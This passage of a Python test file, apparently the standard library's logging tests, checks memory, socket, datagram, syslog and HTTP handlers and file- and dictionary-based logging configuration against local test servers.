class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
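# Minimal MemoryHandler sketch (ours; not used by the tests above). Records
# are buffered until either `capacity` records have accumulated or a record
# at `flushLevel` or above arrives; flushing forwards the buffer to `target`.
def _demo_memory_handler():
    target = logging.StreamHandler(io.StringIO())
    buffering = logging.handlers.MemoryHandler(capacity=10,
                                               flushLevel=logging.ERROR,
                                               target=target)
    demo_logger = logging.getLogger('demo.memory')
    demo_logger.addHandler(buffering)
    demo_logger.warning('buffered')          # held in memory
    demo_logger.error('flushes the buffer')  # >= flushLevel, so flush now
    demo_logger.removeHandler(buffering)
    buffering.close()                        # flushes any remaining records
    return target.stream.getvalue()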
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
            # On Windows, replace single backslashes with double backslashes
            # to avoid a unicode error during string formatting.
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
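        # SocketHandler frames each record as a 4-byte big-endian length
        # prefix followed by a pickled dict of the LogRecord's attributes;
        # read the length, then the payload, then rebuild the record.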
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
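        # DatagramHandler sends the same pickled record dict as SocketHandler,
        # still prefixed with a 4-byte length; the prefix is redundant for UDP
        # and is simply stripped off here.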
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
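        # '<11>' is the syslog PRI field: facility LOG_USER (1) * 8 + severity
        # 'err' (3) = 11; the trailing NUL byte comes from append_nul, which
        # defaults to True.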
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
    def _assert_survival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
        self._assert_survival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
        # Historically (Python 2.x) a plain file object was treated as having
        # no encoding; here an explicit encoding is passed to FileHandler.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
            # confirm our assumption: no handlers are set on the logger yet
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
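# Illustrative sketch (ours; never applied): dictConfig() accepts a '()' key
# naming a factory - either a dotted-path string or an actual callable such
# as formatFunc/handlerFunc above - which config4/config4a below exercise.
_demo_dict_config = {
    'version': 1,
    'formatters': {
        'demo': {'()': formatFunc, 'format': '%(levelname)s:%(message)s'},
    },
    'handlers': {
        'demo': {'()': handlerFunc, 'formatter': 'demo', 'level': 'DEBUG'},
    },
    'root': {'level': 'DEBUG', 'handlers': ['demo']},
}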
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
